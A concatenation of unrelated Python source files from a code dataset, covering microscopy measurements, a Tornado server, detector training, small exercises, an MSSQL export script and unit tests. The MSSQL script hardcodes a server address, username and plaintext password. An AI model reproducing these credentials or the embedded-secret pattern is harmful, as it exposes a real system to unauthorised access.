e:\n traceback.print_exc(file=sys.stdout)\n\n","sub_path":"scripts/Raspberry1Click/cloud/aws/AWS_publish.py","file_name":"AWS_publish.py","file_ext":"py","file_size_in_byte":4946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"163069964","text":"\"\"\"\nA custom class to contain the bacteria measurements\n\"\"\"\n\n\nclass BacteriaData():\n \"\"\"\n A class that containts all the data for all the bacteria\n\n Attributes\n ------\n bacteria : dictionary\n A dictionary where the key is the bacteria number and the\n value is an instance of an `IndividualBacteria` containing\n its respective information\n \"\"\"\n def __init__(self):\n self.bacteria = {}\n\n def add_bac_data(\n self, bac_num, bacteria_lineage, region, tpoint, well_label=None):\n \"\"\"\n Creates a new instance of the IndividualBacteria class for a new\n bacteria, or updates it if it already exists\n\n Parameters\n ------\n bac_num : int\n The bacteria number that links to the unique label of the bacteria\n 
bacteria_lineage : dictionary\n A dictionary that links the physical unique label of a bacteria\n to one which shows information on its lineage\n region : list of RegionProperties\n Each item describes one labeled region, and can be accessed\n using the attributes listed below\n tpoint : int\n The timepoint for the measurement\n \"\"\"\n # checks to see if the bacteria exists, adds data if it does and\n # records the timepoint\n if bac_num not in self.bacteria.keys():\n self.bacteria[bac_num] = IndividualBacteria(bac_num)\n self.bacteria[bac_num].add_string(bacteria_lineage[bac_num])\n self.bacteria[bac_num].well_label = well_label\n self.bacteria[region.label].add_bf_values(region, tpoint)\n\n def measure_fluo(self, region, fluorescence_data, bkg_values, timepoint):\n \"\"\"\n Adds fluorescent data for a bacteria\n\n Parameters\n ------\n region : list of RegionProperties\n Each item describes one labeled region, and can be accessed\n using the attributes listed below\n fluorescence_data : ndarray\n Array containing all the original fluorescent data (2D\n if just one frame)\n bkg_values : tuple\n tuple in the format (background fluorescence, background\n SEM) for the\n respective image\n timepoint : int\n The timepoint for the measurement\n \"\"\"\n # adds fluorescence measurements\n self.bacteria[region.label].add_fluo_values(\n region, fluorescence_data, bkg_values, timepoint)\n\n def compile_results(self, max_tpoint=0):\n \"\"\"\n Compiles all of the measurements\n\n Parameters\n ------\n max_tpoint : int\n The last timepoint for the measurements\n \"\"\"\n # compiles the results for each bacteria into a simple list\n # which can easily be written to a CSV\n for bac in self.bacteria.values():\n bac.compile_data(max_tpoint)\n\n\nclass IndividualBacteria():\n \"\"\"\n A custom class which contains all the required information for\n an individual bacterium\n\n Attributes\n ------\n bacteria_number : int\n The unique number of the bactera\n bacteria_label : str\n The unique label with the bacterias lineage information\n well_label : int\n Integer identifying the well the bacteria belongs to\n bf_measurements : dictionary\n The keys (\"Area\",\"Width\",\"Length\") can be used to access chronological\n lists of these measurements\n raw_fluorescence : dictionary\n Keys are a tuple (timepoint, fluorescence channel) which can be used\n to access the raw fluorescence values\n actual_fluorescence : dictionary\n Keys are a tuple (timepoint, fluorescence channel) which can be used\n to access the background subtracted fluorescence values\n integrated_fluorescence : dictionary\n Keys are a tuple (timepoint, fluorescence channel) which can be used\n to access the integrated (actual x area) fluorescence values\n headings_line : list\n A list of the types of measurments, repeated for each timepoint,\n that can easily be written to a csv\n measurements_output : list\n A list of the measurments, repeated for each timepoint,\n that can easily be written to a csv\n timepoints : list\n A list of the timepoints that information is held for\n num_fluo : int\n The number of fluorescent channels information is held for\n \"\"\"\n\n def __init__(self, bac_num):\n self.bacteria_number = bac_num\n self.bacteria_label = None\n self.well_label = None\n self.bf_measurements = {\n \"Area\": [],\n \"Width\": [],\n \"Length\": [],\n }\n self.raw_fluorescence = {}\n self.actual_fluorescence = {}\n self.integrated_fluorescence = {}\n self.headings_line = []\n self.measurements_output = []\n self.timepoints = []\n 
self.num_fluo = 0\n\n def add_string(self, label):\n \"\"\"\n Adds a readable label\n\n Parameters\n ------\n Label : str\n The label to be added\n \"\"\"\n self.bacteria_label = label\n\n def add_bf_values(self, region, tpoint):\n \"\"\"\n Updates the brightfield information\n\n Parameters\n ------\n region : list of RegionProperties\n Each item describes one labeled region, and can be accessed\n using the attributes listed below\n tpoint : int\n The timepoint the data corresponds to\n \"\"\"\n self.bf_measurements[\"Area\"].append(region.area)\n self.bf_measurements[\"Width\"].append(region.minor_axis_length)\n self.bf_measurements[\"Length\"].append(region.major_axis_length)\n self.timepoints.append(tpoint)\n\n def add_fluo_values(self, region, fluorescence_data,\n bkg_values, timepoint):\n \"\"\"\n Updates the fluorescence information\n\n Parameters\n ------\n region : list of RegionProperties\n Each item describes one labeled region, and can be accessed\n using the attributes listed below\n fluorescence_data : ndarray\n Array containing all the original fluorescent data (2D if\n just one frame)\n bkg_values : tuple\n tuple in the format (background fluorescence, background\n SEM) for the respective image\n timepoint : int\n The timepoint the data corresponds to\n \"\"\"\n self.num_fluo = len(fluorescence_data)\n import mmhelper.measurements as mmeas\n for num, (fluo_im, bkg) in enumerate(\n zip(fluorescence_data, bkg_values)):\n fluo, fluo_bg, int_fluo = mmeas.fluorescence_measurements(\n region, fluo_im, bkg)\n self.raw_fluorescence[(timepoint, num)] = fluo\n self.actual_fluorescence[(timepoint, num)] = fluo_bg\n self.integrated_fluorescence[(timepoint, num)] = int_fluo\n\n def compile_data(self, max_tpoint):\n \"\"\"\n Compiles all of the data into a readable output\n\n Parameters\n ------\n max_tpoint : int\n The final timepoint for the analysis\n \"\"\"\n if not self.raw_fluorescence:\n fluo_values = 0\n else:\n fluo_values = 3\n missed_detection = self.set_missed_detection_line(\n fluo_values=fluo_values)\n data_line = []\n for tindex in range(0, max_tpoint):\n data_line.append([self.well_label])\n data_line.append([self.bacteria_label])\n if tindex not in self.timepoints:\n data_line.append(missed_detection)\n continue\n bf_data_index = self.timepoints.index(tindex)\n data_line.append([self.bf_measurements[key][bf_data_index]\n for key in sorted(self.bf_measurements.keys())])\n for num in range(0, self.num_fluo):\n data_line.append([self.raw_fluorescence[(tindex, num)],\n self.actual_fluorescence[(tindex, num)],\n self.integrated_fluorescence[(tindex, num)]])\n self.set_heading_line(max_tpoint)\n self.measurements_output = [\n item for sublist in data_line for item in sublist]\n\n # Fluo_values is the number of measurements from each fluo image\n def set_missed_detection_line(self, fluo_values=3):\n \"\"\"\n Creates a line of hyphens that will be used if the detection is misssed\n\n Parameters\n ------\n fluo_values : int\n The number of fluorescent measurements that are included\n in the results\n \"\"\"\n return ([\"-\"] * (len(self.bf_measurements) +\n (self.num_fluo * fluo_values)))\n\n def set_lysed_bacteria_line(self, fluo_values=3):\n \"\"\"\n Creates a line of 0's that will be used if the bacteria has lysed\n\n Parameters\n ------\n fluo_values : int\n The number of fluorescent measurements that are included\n in the results\n \"\"\"\n return ([0] * (len(self.bf_measurements) +\n (self.num_fluo * fluo_values)))\n\n def set_heading_line(self, max_tpoint):\n \"\"\"\n Sets 
the heading line that will be used at the top of the\n measurements CSV\n\n Parameters\n ------\n max_tpoint : int\n The final timepoint for the analysis\n \"\"\"\n headings = [[\"well label\",\n \"lineage\",\n \"area\",\n \"length\",\n \"width\"],\n ([\"raw_fluorescence\",\n \"fluorescence\",\n \"integrated_fluorescence\"] * self.num_fluo)]\n headings = [\n [item for sublist in headings for item in sublist] * max_tpoint]\n self.headings_line = [item for sublist in headings for item in sublist]\n","sub_path":"mmhelper/measurements_class.py","file_name":"measurements_class.py","file_ext":"py","file_size_in_byte":9987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"279380096","text":"#!/usr/bin/env python\n# coding: utf-8\nfrom tornado.httpserver import HTTPServer\nfrom tornado.ioloop import IOLoop\nfrom tornado.log import enable_pretty_logging\nfrom tornado.web import Application\n\nfrom concurrent.futures import ThreadPoolExecutor\n\nfrom api.utils.db import get_db_session\nfrom api.utils.settings import get_normalized_settings\nfrom api.v1_0.handlers.urls import APIUrls\n\n\nclass TenantApplication(Application):\n\n def __init__(self, handlers, **settings):\n Application.__init__(self, handlers, **settings)\n self.db = get_db_session(settings)\n self.thread_pool = ThreadPoolExecutor(5)\n\n\nif __name__ == \"__main__\":\n loop = IOLoop.instance()\n settings = get_normalized_settings()\n application = TenantApplication(handlers=APIUrls, **settings)\n\n if settings['debug']:\n enable_pretty_logging()\n application.listen(\n settings['bind_port'],\n settings['bind_addr'],\n )\n else:\n server = HTTPServer(application)\n server.bind(\n settings['bind_port'],\n settings['bind_addr']\n )\n server.start(settings['tornado_start'])\n\n loop.start()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"393153620","text":"import os, sys, time\nimport json\nimport pickle\nimport argparse\nimport random\n\nimport numpy as np\nfrom PIL import Image, ImageFile\nfrom tqdm import tqdm\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.backends.cudnn as cudnn\nimport torch.nn.init as init\n\nimport torchvision.transforms as transforms\n\n#from data import *\nfrom layers.modules import RefineDetMultiBoxLoss\nfrom models.refinedet import build_refinedet\n#from utils.logging import Logger\n#from utils.augmentations import SSDAugmentation\nfrom utilsdet.datagen import RefineListDataset\n\n\nparser = argparse.ArgumentParser(\n description='Single Shot MultiBox Detector Training With Pytorch')\ntrain_set = parser.add_mutually_exclusive_group()\nparser.add_argument('--input_size', default='512', choices=['320', '512'],\n type=str, help='RefineDet320 or RefineDet512')\nparser.add_argument('--basenet', default='./weights/vgg16_reducedfc.pth',\n help='Pretrained base model')\nparser.add_argument('--batch_size', default=64, type=int,\n help='Batch size for training')\nparser.add_argument('--epoch', default=300, type=int)\nparser.add_argument('--resume', default=None, type=str,\n help='Checkpoint state_dict file to resume training from')\nparser.add_argument('--start_iter', default=0, type=int,\n help='Resume training at this iter')\nparser.add_argument('--num_workers', default=0, type=int,\n help='Number of workers used in dataloading')\nparser.add_argument('--seed', default=1, type=int,\n 
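The compile_data() and set_heading_line() methods above collapse a list of lists with a nested comprehension. itertools.chain.from_iterable is the equivalent standard-library spelling; a minimal, self-contained sketch with made-up sample data:

from itertools import chain

nested = [["well label", "lineage"], ["area", "length", "width"]]
flat_comprehension = [item for sublist in nested for item in sublist]
flat_chain = list(chain.from_iterable(nested))
assert flat_comprehension == flat_chain == ["well label", "lineage", "area", "length", "width"]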
help='Random state')\nparser.add_argument('--cuda', default=True, type=bool,\n help='Use CUDA to train model')\nparser.add_argument('--lr', '--learning-rate', default=1e-3, type=float,\n help='initial learning rate')\nparser.add_argument('--momentum', default=0.9, type=float,\n help='Momentum value for optim')\nparser.add_argument('--weight_decay', default=5e-4, type=float,\n help='Weight decay for SGD')\nparser.add_argument('--gamma', default=0.1, type=float,\n help='Gamma update for SGD')\nparser.add_argument('--save_folder', default='results/refinedet',\n help='Directory for saving checkpoint models')\nargs = parser.parse_args()\n\n\n#sys.stdout = Logger(os.path.join(args.save_folder, 'log.txt'))\n\ndef load_image(index):\n Image.MAX_IMAGE_PIXELS = 10000000000\n ImageFile.LOAD_TRUNCATED_IMAGES = True\n image_name = f\"source/train_images/train_{index:0>2}.jpg\"\n img = Image.open(image_name)\n return img\n\n\ndef load_labels(index):\n pos = []\n with open(f\"data/det_label/train_{index:0>2}_grid_step128_256_0.9.p\", \"rb\") as f:\n pos_labels, _ = pickle.load(f)\n pos.extend(pos_labels)\n with open(f\"data/det_label/train_{index:0>2}_grid_step96_192_0.9.p\", \"rb\") as f:\n pos_labels, _ = pickle.load(f)\n pos.extend(pos_labels)\n #with open(f\"data/det_label/train_{index:0>2}_grid_step64_128_0.9.p\", \"rb\") as f:\n # pos_labels, _ = pickle.load(f)\n #pos.extend(pos_labels)\n return pos\n\n\ndef main():\n cfg = {\"casename\":f\"refinedet_2_union2(0.9)_256\",\n 'min_dim':512,\n 'num_classes':3+1,\n 'in_size':256,\n 'lr_steps':(80000, 100000, 120000)}\n\n assert torch.cuda.is_available()\n\n if not os.path.exists(args.save_folder):\n os.mkdir(args.save_folder)\n\n seed = args.seed\n random.seed(seed)\n torch.manual_seed(seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed_all(seed)\n\n # Data\n print('Loading the dataset...')\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.485,0.456,0.406), (0.229,0.224,0.225))\n ])\n\n trainset = RefineListDataset(np.arange(18), transform, cfg['in_size'], train=True)\n validset = RefineListDataset(np.arange(18,20), transform, cfg['in_size'], train=False)\n\n num_workers = 0\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=args.batch_size, shuffle=True, num_workers=num_workers, collate_fn=trainset.collate_fn)\n validloader = torch.utils.data.DataLoader(validset, batch_size=args.batch_size, shuffle=False, num_workers=num_workers, collate_fn=validset.collate_fn)\n\n print(f\"trainset_size:{len(trainset)}, trainloader_size:{len(trainloader)}\")\n print(f\"validset_size:{len(validset)}, validloader_size:{len(validloader)}\")\n\n # build model\n refinedet_net = build_refinedet('train', cfg['min_dim'], cfg['num_classes'])\n if args.cuda:\n net = torch.nn.DataParallel(refinedet_net)\n cudnn.benchmark = True\n else:\n net = refinedet_net\n\n optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=args.momentum,\n weight_decay=args.weight_decay, nesterov=False)\n\n casename = cfg[\"casename\"]\n if args.resume:\n print('Resuming training, loading {}...'.format(args.resume))\n checkpoint = torch.load(args.resume)\n net.load_state_dict(checkpoint[\"net\"])\n optimizer.load_state_dict(checkpoint[\"optimizer\"])\n start_epoch = checkpoint[\"epoch\"] + 1\n with open(f'./results/{casename}/log', \"r\") as f:\n logs = json.load(f)\n else:\n #vgg_weights = torch.load(args.save_folder + args.basenet)\n vgg_weights = torch.load(args.basenet)\n print('Loading base network...')\n 
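Note that the --cuda flag above is declared with type=bool, a common argparse pitfall: bool('False') is True, so the flag cannot actually be turned off from the command line. A small sketch of the usual store_true/store_false workaround (the flag names are kept, the wiring is assumed):

import argparse

parser = argparse.ArgumentParser()
# bool('False') == True, so 'type=bool' treats any non-empty string as truthy.
parser.add_argument('--cuda', dest='cuda', action='store_true',
                    help='Use CUDA to train model')
parser.add_argument('--no-cuda', dest='cuda', action='store_false')
parser.set_defaults(cuda=True)
assert parser.parse_args(['--no-cuda']).cuda is False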
refinedet_net.vgg.load_state_dict(vgg_weights)\n start_epoch = 0\n logs = []\n if os.path.exists(f\"./results/{casename}/log\"):\n key = input(\"Found log file. continue? [y] \")\n if key == \"y\":\n pass\n else:\n assert False, f\"found log file [results/{casename}/log]\"\n\n # Device\n gpu_id = 0\n device = torch.device(f\"cuda:{gpu_id}\")\n net = net.to(device)\n\n if not args.resume:\n print('Initializing weights...')\n # initialize newly added layers' weights with xavier method\n refinedet_net.extras.apply(weights_init)\n refinedet_net.arm_loc.apply(weights_init)\n refinedet_net.arm_conf.apply(weights_init)\n refinedet_net.odm_loc.apply(weights_init)\n refinedet_net.odm_conf.apply(weights_init)\n #refinedet_net.tcb.apply(weights_init)\n refinedet_net.tcb0.apply(weights_init)\n refinedet_net.tcb1.apply(weights_init)\n refinedet_net.tcb2.apply(weights_init)\n\n arm_criterion = RefineDetMultiBoxLoss(2, 0.5, True, 0, True, 3, 0.5,\n False, device)\n odm_criterion = RefineDetMultiBoxLoss(cfg['num_classes'], 0.5, True, 0, True, 3, 0.5,\n False, device, use_ARM=True)\n\n global g_n_iter\n global step_index\n g_n_iter = 0\n step_index = 0\n def train():\n global g_n_iter\n global step_index\n net.train()\n n_iter = 0\n sum_arm_loc_loss = 0\n sum_arm_cls_loss = 0\n sum_odm_loc_loss = 0\n sum_odm_cls_loss = 0\n for inputs, loc_targets, cls_targets in tqdm(trainloader, ncols=60, leave=False):\n if g_n_iter in cfg['lr_steps']:\n print(\"change lr\")\n step_index += 1\n adjust_learning_rate(optimizer, args.gamma, step_index)\n\n inputs = inputs.to(device)\n loc_targets = [target.to(device) for target in loc_targets]\n cls_targets = [target.to(device) for target in cls_targets]\n\n optimizer.zero_grad()\n preds = net(inputs)\n\n arm_loc_loss, arm_cls_loss = arm_criterion(preds, loc_targets, cls_targets)\n odm_loc_loss, odm_cls_loss = odm_criterion(preds, loc_targets, cls_targets)\n loss = arm_loc_loss + arm_cls_loss + odm_loc_loss + odm_cls_loss\n\n loss.backward()\n optimizer.step()\n\n n_iter = n_iter + 1\n g_n_iter = g_n_iter + 1\n sum_arm_loc_loss += arm_loc_loss.data.cpu().numpy()\n sum_arm_cls_loss += arm_cls_loss.data.cpu().numpy()\n sum_odm_loc_loss += odm_loc_loss.data.cpu().numpy()\n sum_odm_cls_loss += odm_cls_loss.data.cpu().numpy()\n #print(f\"{sum_arm_loc_loss:.3f},{sum_arm_cls_loss:.3f}, {sum_odm_loc_loss:.3f}, {sum_odm_cls_loss:.3f}\")\n sum_arm_loc_loss /= n_iter\n sum_arm_cls_loss /= n_iter\n sum_odm_loc_loss /= n_iter\n sum_odm_cls_loss /= n_iter\n return sum_arm_loc_loss, sum_arm_cls_loss, sum_odm_loc_loss, sum_odm_cls_loss\n\n def valid():\n net.eval()\n n_iter = 0\n sum_arm_loc_loss = 0\n sum_arm_cls_loss = 0\n sum_odm_loc_loss = 0\n sum_odm_cls_loss = 0\n for inputs, loc_targets, cls_targets in tqdm(validloader, ncols=60, leave=False):\n with torch.set_grad_enabled(False):\n inputs = inputs.to(device)\n loc_targets = [target.to(device) for target in loc_targets]\n cls_targets = [target.to(device) for target in cls_targets]\n\n preds = net(inputs)\n\n arm_loc_loss, arm_cls_loss = arm_criterion(preds, loc_targets, cls_targets)\n odm_loc_loss, odm_cls_loss = odm_criterion(preds, loc_targets, cls_targets)\n\n n_iter = n_iter + 1\n sum_arm_loc_loss += arm_loc_loss.data.cpu().numpy()\n sum_arm_cls_loss += arm_cls_loss.data.cpu().numpy()\n sum_odm_loc_loss += odm_loc_loss.data.cpu().numpy()\n sum_odm_cls_loss += odm_cls_loss.data.cpu().numpy()\n\n return sum_arm_loc_loss / n_iter, sum_arm_cls_loss / n_iter, sum_odm_loc_loss / n_iter, sum_odm_cls_loss / n_iter\n\n\n def save(epoch, 
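The adjust_learning_rate()/lr_steps bookkeeping in this script reimplements what torch.optim.lr_scheduler.MultiStepLR provides out of the box. A minimal equivalent sketch, with a stand-in module and the same milestones and gamma:

import torch
from torch.optim.lr_scheduler import MultiStepLR

model = torch.nn.Linear(4, 2)  # stand-in for the detector
optimizer = torch.optim.SGD(model.parameters(), lr=1e-3, momentum=0.9)
# Decays lr by 0.1 at the same iteration counts as cfg['lr_steps'],
# provided scheduler.step() is called once per training iteration.
scheduler = MultiStepLR(optimizer, milestones=[80000, 100000, 120000], gamma=0.1)
for _ in range(5):
    optimizer.step()
    scheduler.step()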
casename):\n # Save checkpoint\n state = {\n 'epoch': epoch,\n 'net': net.state_dict(),\n 'optimizer': optimizer.state_dict(),\n }\n torch.save(state, f'./results/{casename}/{epoch}.pth')\n\n\n os.makedirs(f\"results/{casename}\", exist_ok=True)\n print(\"epoch\\tphase\\tarm_loc_loss\\tarm_cls_loss\\todm_loc_loss\\todm_cls_loss\\telapse_time\")\n for epoch in range(start_epoch, start_epoch+args.epoch):\n start_time = time.time()\n log = {\"epoch\":epoch}\n arm_loc_loss, arm_cls_loss, odm_loc_loss, odm_cls_loss = train()\n log[\"train/arm_loc_loss\"] = arm_loc_loss\n log[\"train/arm_cls_loss\"] = arm_cls_loss\n log[\"train/odm_loc_loss\"] = odm_loc_loss\n log[\"train/odm_cls_loss\"] = odm_cls_loss\n print(f'{epoch}, train, {arm_loc_loss:.6f}, {arm_cls_loss:.6f}, {odm_loc_loss:.6f}, {odm_cls_loss:.6f}, {time.time() - start_time:.2f}')\n arm_loc_loss, arm_cls_loss, odm_loc_loss, odm_cls_loss = valid()\n log[\"valid/arm_loc_loss\"] = arm_loc_loss\n log[\"valid/arm_cls_loss\"] = arm_cls_loss\n log[\"valid/odm_loc_loss\"] = odm_loc_loss\n log[\"valid/odm_cls_loss\"] = odm_cls_loss\n print(f'{epoch}, valid, {arm_loc_loss:.6f}, {arm_cls_loss:.6f}, {odm_loc_loss:.6f}, {odm_cls_loss:.6f}, {time.time() - start_time:.2f}')\n log['elapse_time'] = time.time() - start_time\n logs.append(log)\n with open(f\"results/{casename}/log\", \"w\") as f:\n json.dump(logs, f, indent=4)\n save(epoch, casename)\n print('------------------------------------')\n\n\ndef adjust_learning_rate(optimizer, gamma, step):\n \"\"\"Sets the learning rate to the initial LR decayed by 10 at every\n specified step\n # Adapted from PyTorch Imagenet example:\n # https://github.com/pytorch/examples/blob/master/imagenet/main.py\n \"\"\"\n lr = args.lr * (gamma ** (step))\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\n\ndef xavier(param):\n init.xavier_uniform_(param)\n\n\ndef weights_init(m):\n if isinstance(m, nn.Conv2d):\n xavier(m.weight.data)\n m.bias.data.zero_()\n elif isinstance(m, nn.ConvTranspose2d):\n xavier(m.weight.data)\n m.bias.data.zero_()\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"train_refinedet.py","file_name":"train_refinedet.py","file_ext":"py","file_size_in_byte":11983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"125012962","text":"# https://www.urionlinejudge.com.br/judge/pt/problems/view/1197\n\n# -*- coding: utf-8 -*-\n\nwhile True:\n try:\n\n v, t = list(map(int, input().split()))\n t *= 2\n deslocamento = v * t\n print(deslocamento)\n\n except EOFError:\n break","sub_path":"Python3/Matemática/1197 - Volta à Faculdade de Física.py","file_name":"1197 - Volta à Faculdade de Física.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"491302634","text":"from decimal import Decimal, InvalidOperation\n\n\nif __name__ == '__main__':\n try:\n total = Decimal(input('Enter the purchase total: '))\n given = Decimal(input('How much are you paying with? 
'))\n    except InvalidOperation:\n        print('Invalid input!')\n        exit(2)\n\n    change = given - total\n\n    denominations = {\n        'hundreds': 100.0,\n        'fifties': 50.0,\n        'twenties': 20.0,\n        'tens': 10.0,\n        'fives': 5.0,\n        'ones': 1.0,\n        'quarters': 0.25,\n        'dimes': 0.10,\n        'nickels': 0.05,\n        'pennies': 0.01,\n    }\n    results = {}\n    remaining_change = change\n\n    for denomination, value in denominations.items():\n        # Convert through str() so floats like 0.10 become exact Decimals.\n        value = Decimal(str(value))\n        results[denomination] = int(remaining_change / value)\n        # Determine how much to remove from our change. Multiply the\n        # result by the denomination value; keep it a Decimal so the\n        # sub-dollar denominations are not truncated away.\n        counted = results[denomination] * value\n        remaining_change = remaining_change - counted\n\n    print('Change Calculator')\n    print('-----------------')\n    print(f'  For a purchase totalling ${total} and')\n    print(f'  the amount given to pay of ${given}, the')\n    print(f'  change would be ${change}, which can be')\n    print(f'  broken down as:\\n')\n\n    for denomination, number in results.items():\n        print(f'  - {number} {denomination}')\n","sub_path":"numbers/change_calc.py","file_name":"change_calc.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"623312224","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: xl\n\nextract and merge full-data raw data ETL\n\"\"\"\nimport sys\nimport pymssql\nimport os\nimport csv\nimport datetime\n\n\nclass MsSQL:\n    def __init__(self, host, user, password, database, charset):\n        self.host = host\n        self.user = user\n        self.password = password\n        self.database = database\n        self.charset = charset\n        self.db = None\n        self.curs = None\n\n    def connect(self):\n        try:\n            self.db = pymssql.connect(\n                host=self.host,\n                user=self.user,\n                password=self.password,\n                database=self.database,\n                charset=self.charset\n            )\n            self.curs = self.db.cursor()\n            print(\"Connected to the MSSQL database!\")\n        except:\n            print(\"Failed to connect to the database\")\n            # exit(0)\n\n    def close(self):\n        self.curs.close()\n        self.db.close()\n\n    def read(self, sql, params):\n        self.connect()\n        try:\n            if params == None:\n                self.curs.execute(sql)\n            else:\n                self.curs.execute(sql, params)\n            print(\"Data read successfully!\")\n\n            rows = self.curs.fetchall()\n            description = self.curs.description\n            return rows, description\n\n        except Exception as e:\n            # roll back on error\n            print('Failed to read data')\n            print(repr(e))\n            self.db.rollback()\n        finally:\n            self.close()\n\n\ndef sql2csv(rows, description, output_path):\n    with open(os.path.abspath(output_path), 'w+', newline='', encoding='utf-8') as tb_output:\n        writer = csv.writer(tb_output)\n        # write the CSV header row\n        writer.writerow([i[0] for i in description])\n        for row in rows:\n            writer.writerow(row)\n        tb_output.close()\n\n\nif __name__ == '__main__':\n    # Requires three arguments: the end date of the full data set, the size\n    # of the time window, and the output directory (down to the last level).\n    # e.g. 2018-02-01 3 C:/TeraData\n    # print(len(sys.argv))\n    # for i in range(0, len(sys.argv)):\n    #     print(sys.argv[i])\n    if len(sys.argv) != 4:\n        raise ValueError(\"arguments problem, please check!\")\n\n    end_time = sys.argv[1]\n    time_window = int(sys.argv[2])\n    output_directory = sys.argv[3]\n\n    # start_time = \"2018-01-01\"\n    end_time_array = end_time.split(\"-\")\n    end_year = int(end_time_array[0])\n    end_month = int(end_time_array[1])\n    end_day = int(end_time_array[2])\n    time = datetime.date(end_year, end_month, end_day)\n\n    select_sql = \"select lefttable.*,cardinfor.compno, cardpsninfor.compname,cardpsninfor.identifyno,\" \\\n                 \"cardpsninfor.knowledge,cardpsninfor.province,cardpsninfor.cardnum,\" \\\n                 \"cardpsninfor.telphno1,cardpsninfor.telphno2,cardpsninfor.compaddrs from \" \\\n                 \"(select nodeno,cardno,oilno,opetime,litter,amount,balance from oildetail \" \\\n                 \"where convert(varchar,mssql_time,23) = %s and oilno not in ('60000288','60000291','60000292') and nodeno like '32%') as lefttable \" \\\n                 \"left join cardinfor on lefttable.cardno = cardinfor.cardno \" \\\n                 \"inner join cardpsninfor on cardinfor.compno = cardpsninfor.compno \" \\\n                 \"order by opetime asc\"\n\n    db = MsSQL('10.182.5.217', 'tr', '1qaz@WSX', 'OILCARD_DB','utf8')\n    for day in range(time_window):\n        end_time = (time + datetime.timedelta(days=-day)).isoformat()\n        output_path = output_directory + \"/alldata_\" + end_time + \".csv\"\n        print('Started processing data for %s' % end_time)\n        rows, description = db.read(select_sql, end_time)\n        sql2csv(rows, description, output_path)\n        print('Finished processing data for %s' % end_time)\n","sub_path":"oil/MergeFullDataSQL.py","file_name":"MergeFullDataSQL.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"18299952","text":"#!/usr/bin/python3\n\"\"\"\nTests for Base Class\n\"\"\"\nimport unittest\nfrom models.base import Base\nfrom models.rectangle import Rectangle\nfrom models.square import Square\n\n\nclass test_base(unittest.TestCase):\n    \"\"\" Test Base methods \"\"\"\n    def setUp(self):\n        \"\"\" Imports module, instantiates class \"\"\"\n        Base._Base__nb_objects = 0\n\n    def tearDown(self):\n        \"\"\" Cleans up after each test \"\"\"\n        pass\n\n    def test_nb_objects_private(self):\n        \"\"\" Tests if nb_objects is a private class attribute \"\"\"\n        self.assertTrue(hasattr(Base, \"_Base__nb_objects\"))\n\n    def test_nb_objects_initialized(self):\n        \"\"\" Tests if nb_objects initializes to zero \"\"\"\n        self.assertEqual(Base._Base__nb_objects, 0)\n\n    def test_instantiation(self):\n        \"\"\" Tests instantiation \"\"\"\n        b = Base(1)\n        self.assertEqual(str(type(b)), \"<class 'models.base.Base'>\")\n        self.assertEqual(b.__dict__, {\"id\": 1})\n        self.assertEqual(b.id, 1)\n\n    def test_constructor(self):\n        \"\"\" Tests constructor \"\"\"\n        with self.assertRaises(TypeError) as e:\n            Base.__init__()\n        msg = \"__init__() missing 1 required positional argument: 'self'\"\n        self.assertEqual(str(e.exception), msg)\n\n    def test_constructor_args(self):\n        with self.assertRaises(TypeError) as e:\n            Base.__init__(self, 1, 2)\n        msg = \"__init__() takes from 1 to 2 positional arguments but 3 \\\nwere given\"\n        self.assertEqual(str(e.exception), msg)\n\n    def test_consecutive_ids(self):\n        \"\"\" Tests id consecutively \"\"\"\n        b1 = Base()\n        b2 = Base()\n        self.assertEqual(b1.id + 1, b2.id)\n\n    def test_id_synced(self):\n        \"\"\" Tests sync between class and instance id \"\"\"\n        b = Base()\n        self.assertEqual(getattr(Base, \"_Base__nb_objects\"), b.id)\n\n    def test_custom_id_int(self):\n        \"\"\" Tests custom id \"\"\"\n        i = 98\n        b = Base(i)\n        self.assertEqual(b.id, i)\n\n    def test_custom_id_str(self):\n        i = \"Tabitha\"\n        b = Base(i)\n        self.assertEqual(b.id, i)\n\n    def test_id_keyword(self):\n        \"\"\" Tests id passed as kwarg \"\"\"\n        i = 98\n        b = Base(id=i)\n        self.assertEqual(b.id, i)\n\n    # -- #15 -- #\n    def test_to_json_string(self):\n        \"\"\" Tests to_json_string() \"\"\"\n        with self.assertRaises(TypeError) as e:\n            Base.to_json_string()\n        s = \"to_json_string() missing 1 required positional argument: \\\n'list_dictionaries'\"\n        self.assertEqual(str(e.exception), s)\n\n        self.assertEqual(Base.to_json_string(None), \"[]\")\n        self.assertEqual(Base.to_json_string([]), \"[]\")\n        d = [{'x': 5, 
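The Decimal(str(value)) conversion in the change calculator above is deliberate: building a Decimal straight from a float inherits the float's binary representation error, and truncating the product with int() would silently discard sub-dollar denominations. A short demonstration:

from decimal import Decimal

print(Decimal(0.10))       # 0.1000000000000000055511151231257827...
print(Decimal(str(0.10)))  # 0.1
# int() truncation would make e.g. three quarters count as zero dollars:
print(int(3 * 0.25))        # 0
print(3 * Decimal('0.25'))  # 0.75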
